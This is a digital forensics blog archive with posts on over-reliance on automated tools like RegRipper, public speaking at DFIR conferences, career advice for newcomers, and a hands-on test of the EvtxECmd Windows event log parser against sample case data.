Nuix has a free extension for their Workstation product for automating the use of RegRipper (and one for Yara, as well), and automatically incorporating the results directly into your Nuix 'case'.  This extension automates almost all of what an analyst would need to do to run RegRipper; it automatically locates the hives (independent of the version of Windows), and runs plugins based on the profiles for each hive.  But remember, I said, "almost".  The analyst has to download RegRipper themselves, as well as ensure that the profiles for each hive are updated, based on the currently available plugins.  This is easy enough to do, as the command line tool for RegRipper (i.e., 'rip') includes a switch for automating this process.  But this isn't something that the extension does; to make the best use of the extension, the analyst needs to do just a little bit more work. 

The question then becomes, are you doing it?  Or are you downloading RegRipper and running it via the extension, with no modifications?  Are you pulling everything you need for your case from the Registry hives, or are you relying on the tool to do it for you?

While I have a great appreciation and fondness for automation, and respect for the effort that goes into creating automation, my concern with regard to tools such as RegRipper, log2timeline, plaso, KAPE, etc., is that rather than pulling back the "veil of mystery" and making the data more accessible (and therefore, more within their realm of knowledge) to the analyst, and thereby increasing deep knowledge in a much wider range of analysts, the result is the opposite. Instead, are we allowing automation, particularly at the enterprise level, to add additional layers of abstraction between the data and the analyst?

Don't get me wrong...I'm not bashing tools such as plaso, KAPE, or any other tools like them.  Not at all.  If it makes someone's job easier and more efficient, that's awesome.  It doesn't matter if it's a full-blown compiled application or a batch file...if it works, so be it.  All of these things are wonderful.  But as practitioners, we have to be careful about how we view and use the tools. 

A side effect (or ancillary effect, depending upon how you look at it) of this is that the community has weaponized terms like 'expert' and 'authority'.  These terms are used to set their designees apart, unreachable and untouchable.  "They're the expert, so all of the functionality I would need must be included in that tool that they released for free, and it's not something I need to concern myself with."

Circling back to RegRipper, I don't know everything there is to know about the Windows Registry, and I certainly don't have any insight into your analysis goals, nor the data you're currently examining.  If you've updated RegRipper with the latest set of plugins, there's no guarantee that there are plugins that will extract and parse the data pertinent to your case.  There may be a plugin that parses data from an older version of that application the user launched, but it hasn't been updated in 8 years.  Or maybe the user used an application for which no plugin exists.

Tool and framework development is great; what better to make your work go quicker, more efficient, and less error prone than automation?  And I don't expect that all of a sudden, everyone will know everything; again, that just doesn't make sense.  However, as practitioners, we shouldn't rely on these tools and frameworks to automagically provide all of the data needed for our case, parsed and displayed for our analysis.  Instead, we need to be vigilant, and ensure that we're looking at such things with a critical eye.

My hope is that more folks in the DFIR industry will use these tools and frameworks as a means to develop deeper knowledge of the data and artifacts, rather than an excuse to not do so.

Sunday, May 05, 2019

Being a DFIR Speaker

Brett recently posted a very good article on the three fears folks encounter when comes to public speaking in DFIR.

Reading his article, and re-reading it, got me to thinking about my own experiences.  My first experience speaking in DFIR was at LISA NT 2000; however, it wasn't my first public speaking experience.  I'd taken a required public speaking course in college, and like most folks in college, did what I could through the course, did a brain dump on the exam, and walked away from the material.  That was a mistake.  I was headed into the Marine Corps, and guess what...they put each and every one of us on the hot seat, over and over again.  It began with the "impromptu speech" exercise in Officer Candidate School, where we were each given a few minutes to put together a short speech on a topic that the platoon commander gave us, and we had to give that presentation in front of the rest of the platoon.  No props, no PowerPoint, no finger puppets...just put together and present a concise, coherent presentation.  This training continued the following summer after commissioning as each of us went through The Basic School; for example, there was an evolution of instruction called "techniques of military instruction", where we each had to give a short presentation after choosing from several topics, such as "field sanitation".  Throughout the six months of training, we were constantly giving presentations...patrol orders, and other 5-paragraph orders.

When I returned to The Basic School as an instructor, I had to go through the process called the "murder board"...I had to give the classes I would be presenting in front of the rest of my team, which included other LTs, Capts, and the Major in charge of our group.  After that, there was continual process improvement, as I gave the various classes and presentations to student companies (2ndLts and Warrant Officers), and processed their instructor review forms from each class.

So, yeah...I had a good bit of practice.  Some of the feedback was constructive.  In other instances, the feedback was purposely negative, so that we'd get used to receiving negative feedback.  However, when I was standing on the podium for the first time, giving my first presentation in front of a technical audience in the private sector, I was already pretty beat by the time I got there...the anxiety from my imposter syndrome had kept me amped for so long, I was pretty tired by the time I said, "hello" into the microphone the first time.

Another opportunity I had to present at a major conference was in New Orleans; the conference organizers thought it would be a good idea to hold the conference during Mardi Gras.  This was both a good and bad idea at the same time, because it gave folks something to do besides the conference.  One I was accepted to the conference, I was really looking forward to meeting and engaging with a couple of the folks who would be teaching training courses before the conference...but that ended up being a non-starter, as several of them disappeared into the party crowd the moment their course was complete.

When it came my time to speak, I dutifully got the room a few minutes early to ensure that the AV was suitable, I had the right connectors (VGA, at the time) and everything was set up.  When the time came for me to speak, I looked up and all I could see, in the entire room, was the folks recording the video for the talk, and their lights.  I quite literally could not see anyone else in the room, and was just about to cancel the talk when I realized that there were actually four people in the room besides me, and the video crew.  However, they'd all decided to sit behind the stadium lights the video crew was using, and I couldn't see them.  I ended up giving the presentation to what I assumed was all four people...the door in the back of the room may have opened and closed once or twice during my talk, I don't remember.

Some things that I've found over time are good to prepare yourself for...

There's always going to be someone asking what seems to be out-of-the-ballpark questions.  When the question gets asked, your mind is going to be racing to understand the question and apply it to the context of the presentation and conference.  You'll have just spent weeks, or even months, preparing the materials, and even practicing your presentation.  And you'll have just spent 45 minutes or more, with your mind racing while you were speaking...are you hitting all of your points, are you saying what you wanted to say, oh, god I'm not really reading directly from the slides, am I?  Sound exhausting?  It is.  And you'll get that way-out-beyond-left-field question. 

My recommendation...rather than trying to do a pretty massive context switch on the fly, just say that you'll take it off-line.  Don't get into a back-and-forth right there, because it'll just chew up time and others won't be able to ask their questions.  Or, in the case of presentations just before a break, or lunch, or the end of the day, get to whatever's next.  Besides, it's better to be able to focus your attention on those types of questions when you're not on the podium.

Similar to this is the "...what happens if you..." or "...did you do this..." question.  I remember years ago I was presenting at a conference on NTFS alternate data streams, and I ran through the litany of examples, only to get, "...did you try this?"  If you're confident in the material and the Demo Gods are kind to you that day, there's nothing wrong with opening a command prompt and giving it a shot.  After all, I strive to learn something new from the perspective of others, when I have the opportunity, and this is a good way to go about it.  However, in this case, the question was a "...what happens if you...?" question, and I turned it around...I knew the person asking the question had a Windows laptop open in front of them, so I asked, "...why don't you try it and let us all know what you find."  Now, this wasn't intended to put that person on the spot, nor to single them out.  The purpose of my responding what way was to demonstrate that when the conference was over and we weren't all in the room together, it's possible to get the answer to our questions by simply trying these things ourselves.

Another aspect of this is the smartest person in the room.  You know who they are, because you've seen them at conferences, just like I have.  These are the folks who have a question, stand up, and the first word out of their mouth is "I", and they don't actually ask a question.  Whether they intend it or not, their delivery is going to come across as, "look how much I know" or "look at how smart I am".  Now, I'm not suggesting that this is the intention, I'm simply saying that this is how it comes across, and the best way to handle these situations is to thank them, and maybe follow up with them later in the conference. 

Then there's the long-winded talker who takes the opportunity, once they have the mic and everyone's attention, to abscond with it.  Yes, its exactly how it sounds...there will be someone who "runs away" with your presentation once they have the microphone.  This is another one of those, "...let's take this offline..." moments. 

There are going to be people who ask the question you just answered.  Literally.  I've been to conferences (attended, as well as been a speaker...) where speakers have to submit their presentations prior to the conference date.  The presentations are provided on a CD/DVD, or at the conference web site.  In more recent years, this has all been part of smartphone apps for some conferences; everything, including the schedule and presentation materials are available via the app.  When it comes time for you to speak, the person from the conference who introduces you will usually make a statement about where the presentation materials can be found, and some speakers may also have a URL in their presentation (maybe at the beginning, usually at the end) as to where the slide deck or materials can be found.

And yet, there will still be someone who asks if the materials will be available, and if so, where/when.  It happens.

What I've seen more recently is that even though presentation materials are available, attendees will use their smartphones to take pictures of slides.  I'm not at all sure why people do this if the materials are available, but from my perspective as a speaker, it simply tells me that they aren't interested in what I have to say.

Final Words
I don't for the life of me believe that anything I've shared here today is isolated to the DFIR community.  Not at all.  I am sure that these same sorts of things happen in other communities and at conferences of all types.  However, I'm sharing what I've seen over the years in hopes that it will help others as they prepare to venture forth and engage in speaking at conferences.  If it's a good experience for the speaker, they're more likely to continue.  Good luck.

Lessons From Time In The Industry

I recently had the opportunity to give a presentation to the class taught by a good friend of mine.  She'd asked me well in advance, and over the weeks leading up to the presentation, I went back and forth on the subject matter...what would I talk about to a group of folks just coming into the industry?  I ultimately gave a presentation on Registry analysis, but I had compiled some notes on various other topics, including one of which I'd titled, "Lessons Learned In The Industry".  By the time we got to the presentation, I had more than a few pages of notes, with edit marks, sticky notes, and I'd even written up a couple of Word documents that were now sitting on my desktop.

Instead of crumbling the notes up and deleting the Word docs, I thought it might be a good idea to get the notes written out into some semblance of a presentation, and blog post was as good a place to start as any.  Also, this gives me the opportunity to put something down in writing and edit it, hopefully making it into something that makes a bit of sense before publishing it.

A little bit about myself to provide some context; I started in "information security" about 30 years ago.  If I had to tie my time in the field back to a single point in time, my first real introduction to 'security' came in my initial military training.  This training didn't involve computers, but had to do with information security overall.  A lot of the training involved terrorism awareness (i.e., unusually heavy or dense packages, misspelled names or addresses, stains on packages, etc.), cryptographic equipment, communications security, authentication, etc.  All of this maps directly to the 'cyber' realm today, except for perhaps the issue of misspellings.  As a community, we've gotten to a point where misspellings and issues with grammar are accepted as the norm.

Getting Started
We all start someplace.  I started down the road of computer-based information security while I was in graduate school.  As I've mentioned before, I was in grad school at a very interesting time for the computer industry.  Not only was I attending school on the outskirts of Silicon Valley, but new versions of operating systems were coming out (Windows 95, Windows NT, OS/2 Warp, etc.), and some network security tools (SATAN) were just being developed and released.  After finishing my degree program, I took a class in Java programming out of SJSU, in which the professor spent a lot of time talking about "shippable places".  This is all to say that there was a lot going on in the industry at the time, and a lot of different paths one could follow.

All in all, these were very interesting times, and I was in an very interesting place.  Things were no more or less interesting than they are now, just different.  I was transitioning from military to civilian life, and needed to find "my place", and like many who are just coming into the industry, there was a LOT out there!  So much so, it could be very overwhelming.  All of this is to simply say, I get it. Been there. My recommendation to you, if you're new to the field, is to not overwhelm yourself.  Being overwhelmed is self-inflicted; don't do that to yourself.  Yes, there is a lot to learn, but you don't have to know all of it now.  And you're never going to know all of it.  No one does.

Pick an area of interest, and learn about it.  At the very least, you may decide, "meh, this isn't for me." And you know what?  That's great.  That's okay. That's freakin' awesome!  Don't do something you don't enjoy.  That's the great thing about this industry - there are so many things out there, like hard, technical skills, soft skills, etc., that there's something for everyone. You can be the best technical writer, the best policy analyst, or the best malware reverse engineer you can be.  You can be a great pen tester, or you can opt for the 'blue' side, in DFIR.  Within each of those broad areas, you can further specialize.  But the point is, don't try to boil the ocean.

Be a good generalist, but also specialize in something.  Become good at something.  Then become good at something else.  But also understand, you don't have to be great at everything.  Understand that, deep in your bones.  Know it.  Because you're going to run into "gatekeepers" in this field (just as you will in any other field) who are going to tell you that in order to be a success, you have to model yourself after them.  Not true.  In fact, some of those folks who demand that you be great at everything have some pretty major holes in their own armor.

One of the things I've done is look to an area that doesn’t already have a great deal of attention.  For example, when I was a kid, I played soccer. At the time, everyone wanted to be a forward...forwards scored goals and got all the glory.  No one wanted to be a defender, a fullback, the last line of defense before the goal keeper.  But instead of competing for a forward slot, I ended up getting pretty good at being a defender. Jump forward 20-odd years, and I was working in a shop with half a dozen folks who all swore that Linux was the only true operating system in existence, and no one was taking a good hard look at Windows from the perspective of performing vulnerability assessments.  And yet, all of our customers had infrastructures that consisted of mostly Windows systems.  So, I started digging into Windows systems, with the goal of understanding how to not only determine the point-in-time state of the system, but also how to look across all systems and determine the state of processes and procedures for that environment.  Along the way, I ran across this fascinating thing called the "Registry", and the more I dug into it, the more I learned that I didn't know.  Further, the more I dug into the Registry, the more I learned that few, if any, other analysts were really interested in the Registry.  In those early days, when I would take a break from learning about the Registry and talk to others, I'd learn that most acknowledged that it existed, and some even knew something about it.

Just because I've written two books on the Windows Registry doesn't make me an "expert". Nor has it led to me being sought out, nor recruited, as an expert.  But you know what?  I enjoy digging into the Registry, seeing what's there, and then looking to see how user and adversary behaviors are reflected in the Registry.

A great way to see how far you've come in a learning something is to put together a presentation, and teach what you know to others.  This can be as simply as a "lunch-and-learn" brown bag training session for your team, even done remotely.  This can really help you put your thoughts in order, and as you're developing the presentation, maybe even see gaps in your knowledge and understanding.  Start with what academics call a "literature search"...see what else is already out there.  If you don't have something ground-breaking or earth-shattering, don't worry about it...we all don't know everything, and it's more than likely that most of what you're going to present is going to be beneficial to others, anyway.

Speaking of presenting, Brett Shavers recently published a really good article covering the three most common fears folks encounter when speaking in DFIR.  Not only does my own experience show that Brett's right, but by putting a name to the fears, we call them out of the shadows and into the light where we can address and overcome them.

The Most Important Thing
The most important thing in the industry is you.  Self-care is critically important in this industry.  There will be a good deal of stress placed on you; some, or most of it may be self-inflicted.  You need to ensure that your physical, emotional/mental, and spiritual needs are met.

As an incident responder and consultant, there were times when I was flying out to some remote location. I didn't always have control of when that would occur; many times, a customer would call for immediate response on the West Coast after I'd already put in a full day's work.  This meant that I would get rest as I needed it, stay hydrated, eat healthy (something you can't always do on the road), and be sure to take vitamin supplements, as needed.  To this day, I like to keep Airborne on hand, and will be more focused on taking it when I know I'm traveling.

From an emotional perspective, put the time in to learn about and understand yourself.  Understand what works for you and what doesn't.

I've taken the Myers-Briggs Type Indicator test a lot over the years.  It started when I was on active duty, and the whole time I've been a very strong ISTJ, and I haven't really deviated from that over the years.  What does that mean?  Well, as an "introvert", I recognize how engaging with crowds or large groups of people affect me.  I can go to a conference, engage and participate, but at some point, I'm going to need some "me time".  This can be as simple as getting away for a few minutes, taking a nap, or getting some exercise.  I know that when I do this, I can return refreshed and ready to engage again, rather than be exhausted, sullen, and moody.  People recognize when everything about your body languages says, "I just want to get out of here".  When I've been to multi-day user conferences, try to plan for down time, so I can recharge.

A great book to read, for anyone, is Chapman's The Five Love Languages.  Reading this book and thoughtfully applying the content to ourselves is a great way to begin, or continue, developing self-awareness.  This book applies to relationships, and not just relationships with a spouse or better half, but any relationship.  You can apply what you learn from this book to your kids, family members, friends, and it will even apply when you're doing incident response.  For example, different customers will respond in different ways; some will get a sense of your credibility because they see you doing things, but others may react better to direct, concise verbal reports, or to you just spending the time to listen to them.

Further develop self-awareness by studying emotional intelligence.  Understand your "triggers", learn to recognize those internal forces that cause you to react or feel a certain way, and do this before responding.  Develop an understanding of why you react the way you do, before you respond.  If someone says something to you, verbally, via email or Twitter, etc., what is it that causes you to react the way you do?  Is your reaction negative or positive?  Remember, not everyone has the same perspective you do, and someone who's responding to you, especially online, is going to be in a place that you can't see and may not understand.  So, look at your reactions before responding.

Develop A Network
No one of us knows everything.  I know, I know...that's not easy to hear.  It's easy for us to sit back and assume that someone else knows everything, and then use that as an excuse to not engage with them.  This means that we miss an opportunity to develop our network.  The reason for this is that there is no one person that knows everything or has seen everything in this industry, and sometimes, just seeing a different perspective, even seeing the same thing but from a different point of view, can be very enlightening.

Developing a network goes far beyond clicking "Like", or "RT". Or even beyond clicking both "Like" and "RT".  It goes well beyond just sending someone a connection request, and then doing absolutely nothing beyond that.  Developing a meaningful network requires effort, not only in reaching out to others, but also responding when others reach out.

Stories abound of people not getting jobs through the traditional application submission process, but finding a great job via their network.  This happens because those people put in the effort to build their network.  They reached out to others, and responded when others reached out.

When you are engaged in developing a meaningful network, whether online or in-person/IRL, there are some of things you can do to make things work for you.

First, Be Present.  Nothing says you're simply not interested in the other person more than being distracted and somewhere else mentally. If you're going to attend a social function, a conference presentation or a meeting, and if you absolutely cannot be away from your phone and your email, don't go.  Reschedule.  Send someone else.

What does not being present look like?  Someone goes to a conference, one for which all of the speakers had to send in their slide decks for inclusion on the conference DVD or at the conference web site.  I've been to conferences where the schedule and all of the presentations were available on a smartphone app, so any attendee could access them at any time, and didn't have to be sure to download them prior to the conference.  Then at the beginning of the presentation, the speaker states, "...these slides are available on the conference ...".  However, by the end of the presentation, someone still asks if and where the slides will be available.

USMC Gen. John Allen has been in the news recently, and I associated with him back when he was a Major, and we were both stationed at The Basic School (he commanded the Infantry Officers Course).  One of the things he'd have his instructors do is ask leading questions before a class, and if the student officers were not "present", they would reschedule the class for a less convenient time.

Being Present leads to Ask Good Questions.  If you're read a blog post, an article, or just attended a conference presentation or webinar, be sure to ask questions relevant to the topic.  If someone puts forth the effort to develop a conference presentation or article about something they did, maybe it's best to leave the "...did you also do these other things..." questions for another time, or medium.  Don't subvert or abscond with the context, using it as an opportunity for your own agenda.  If you have a question about something ancillary to the topic, be sure to ask, but do so in a manner and at a time when doing so doesn't derail the conversation.

Learn to Communicate, in both written and verbal form.  None of us are born with the innate ability to clearly and concisely communicate, it's something we learn over time, through experience and with feedback.  I have had experience writing, in various forms (reports, performance reviews, etc.), throughout my career, and I still had to work through understanding my boss's preferred writing style...what they preferred to see with respect to format and content in reports...at various jobs.  Very few of us are just inherently good communicators, and most of us need to work at it.  A little bit of effort in this area will go a long way.

Think about it.  Say you're a DFIR analyst or technical threat hunter.  Now, you have to clearly and concisely communicate your findings and their impact to a customer, someone who's not as technical as you are, and someone who has a different perspective and an entirely different set of concerns than you.  This is also someone who's looking to you, as the 'expert', to communicate with them in a means that they can understand.  This means that you can't communicate to them as you would your peers.

Seek Feedback.  I found this to be highly effective when working high-stress IR engagements (I know what you're thinking, "...aren't they all??").  By finding the appropriate time to ask my point of contact, "how're we doing?" or "how're things going at this point?", I'd get valuable information about their expectations and perspective.  From that feedback, I could then compartmentalize those things that I needed to address immediately, and those things I needed push up to my manager immediately.

This isn't limited to customers.  As an analyst, seek feedback from your peers and your manager, and if you're a manager, seek feedback from your subordinates.  Create a culture where it's easy to do this, without fear that it will be "used against" someone, but will instead be used to make everyone better analysts, better teammates, and stronger peers.

When it comes to your network, and making it stronger, Stop Assuming. What is one of the assumptions I hear from people?  "I assumed you were too busy to answer my email."  Nothing is further from the truth.  I know that some people where "busy" like a badge of honor, so I get it.  But that's not me.  Yes, I have reached out to people, via what I thought was their preferred medium (i.e., email, Twitter, etc.) and not received so much as an acknowledgement.  But so what?  I have no idea what's going on in their life.  The simple fact is that I've always tried to respond in a timely manner, even if it's just a "hey, I got your email and I'll take the time here soon to give it the attention it deserves".  Don't let the assumption that "...they're too busy..." be your self-inflicted excuse for not asking someone a question.

There are other assumptions I hear, but the point is, you can assume something and limit yourself through a self-imposed obstacle, or you can just ask.

Finally
The last thing is to keep the "3 Foot World" principle in mind.  You can only directly affect those things within three feet of you, within arm's reach.  I got this principle from reading a first-person account by a member of SEAL Team 6, as he was recounting going through specialized training in rock climbing.  The thing is, it applies to life equally well.  We have to understand that the only thing that we can control is ourselves...how we respond to things...and the only things that we can directly impact are those things within our 3 Foot World.

What does this mean?  Well, when I was doing incident response on a regular basis, I realized early on that these events are stressful for everyone involved.  However, I cannot control when an adversary is going to suddenly become visible to a customer, and I cannot control how the customer is going to respond.  However, what I could control was my own "3 Foot World", and I did that by developing a process to be prepared for those calls for immediate response that invariably came in at 10:45pm on a Friday.

Before GPS was readily available, I'd get the address of where I was going in relation to the closest airport, and print out 3 different levels or "views", to have with me.  That way, I knew how to get where I was going once I was on the ground.  Once GPS devices got to a point where they were affordable, one of those went into my carry-on bag.  Copies of all imaging documentation, along with any other important templates, went into both my carry-on bag and my checked Pelican case.  I had a hard copy of all important phone numbers (my boss, the customer, etc.), in case all I was left with was a credit card, or just a quarter, to make a phone call (i.e., "my cell phone died" was no excuse).

Everything that went into my carry-on bag went into the same place.  The same was true for my Pelican case...everything went into the same place, and got repacked in the same place when the engagement was complete.  Tableau imagers, laptops, cables, documentation...everything went into the same place.  Also, when there was time, priority was placed on ensuring that software was updated between engagements.  Did I have the latest copies of commercial tools, were my processes up-to-date?

The purpose of all of this was to provide the best service I could to a customer, given that I'm going to be engaging with them during a really stressful time, very likely when they were exhausted, as well as when emotions were running high.  Showing up on-time and prepared may seem like a little thing, but when you're meeting with someone for the first time and they've been pulling 20+ hr days for 10 consecutive days, and the first thing out of your mouth is, "Sorry I'm late..." or "...I forgot this very important item that I need to do my job..."...needless to say, that does not make for a good first impression.

Recognize the "3 Foot World" principle, and apply it.

Thursday, May 02, 2019

EvtxECmd

Eric Zimmerman recently released EvtxECmd, a nifty Windows Event Log file parser that bypasses the Windows API.  There are a lot of advantages to a tool such as this; specifically, by bypassing the API, it doesn't succumb to the 'hiccups' that may occur as a result of files that weren't closed properly, or for some other reason, isn't formatted in a manner the API agrees with.  This is something I've seen with LogParser, as it uses the Windows API, and will fail to parse a file if there's something 'amiss'.

Using data from the Lone Wolf Scenario, I extracted some (not all) of the Windows Event Log files from the image, and used the following command line to run EvtxECmd against this subset of data:

evtxecmd -d F:\lonewolf\data\evtx --csv F:\lonewolf\data\evtx --csvf output.csv

Not only was the output file generated, but a lot of data flew by in the command prompt while the command was processing.  I thought that this might be useful information, so I deleted the output file and re-ran the command:

evtxecmd -d F:\lonewolf\data\evtx --csv F:\lonewolf\data\evtx --csvf output.csv > F:\lonewolf\data\evtx\evtxecmd_trace.txt

Once the command prompt returned, I had the output file, as well as the 'trace' file that contained all of the information provided via the prompt.  A good deal of it was very useful, such as metrics based on the event IDs (albeit without the event sources, or some other unique identifier) and the count of said event IDs found in that log file.  This can be very useful information, and as such, I'd recommend collecting it as part of your investigative process, and keeping it alongside your case notes.

As to the output of the command, the output file contained 31,956 entries; by comparison, Logparser (run via wevtx.bat) threw an error about not being able to open a file (it didn't specify which one), and produced output with 24,770 entries. Clearly, incorporating EvtxECmd into your investigative process will provide a more complete view of the available data, from a total number of events perspective.

However, let's look at some differences in the actual output.  I've always been fascinated by the use of BITS for downloading (and uploading) files.  As there are a number of BITS Client events available, let's look at a simple event, such as event ID 3.

The output from wevtx.bat, using Logparser, looks like this (i.e., TLN format):

1522194038|EVTX|DESKTOP-PM6C56D||Microsoft-Windows-Bits-Client/3;C:\Users\jcloudy\AppData\Local\Temp\{33340A58-DC7C-4FBB-82A9-24EFA8F8C38D}-gsync64.msi,{50A0E739-31CE-4B89-8972-DE76CC505D31},DESKTOP-PM6C56D\jcloudy,C:\Program Files (x86)\Google\Update\GoogleUpdate.exe,9004

The output directly from EvtxECmd for a similar event record looks like this:

279,279,2018-03-30 21:09:16.6870673,3,4,Microsoft-Windows-Bits-Client,Microsoft-Windows-Bits-Client/Operational,3636,11240,DESKTOP-PM6C56D,S-1-5-18,,,,,,,,,,,F:\lonewolf\data\evtx\Microsoft-Windows-Bits-Client%4Operational.evtx

In the case of the EvtxECmd output, there seems to be some important information missing. Talking to Eric about this, he said that in order to get the additional details (i.e., strings, event description) in the CSV output, you need to have a map file for the event.

So, there you go.  Once the appropriate map files are in place and the event description available as part of the output, given the header of the output file, it will be relatively easy to write a script that will translate the output of the tool into something easily incorporated directly into a timeline, for direct inclusion into an analysis process.

For your analysis process, Eric includes map files (read Eric's info for more detail...)...when I ran the tool, there were 52 map files available.  Eric provides a description of how to create your own map files.

A note on using Eric's CLI tools: whenever I install a system, one of my first configuration steps is to modify the command prompt to a white background with black letters.  This makes things much easier for screen captures, particularly for books and presentations.  When running Eric's CLI tools for the first time, I'll get a lot of blank lines in the output, and highlighting or selecting the contents of the screen does not reveal the underlying text.  I reached to Eric and he said that I needed to get the nlog.config file from his site, and include it in the directory with each of the command line tools.  I simply created a folder for Eric's tools, and put one copy of the file alongside all of the other tools.

Resources
Link to EvtxECmd Maps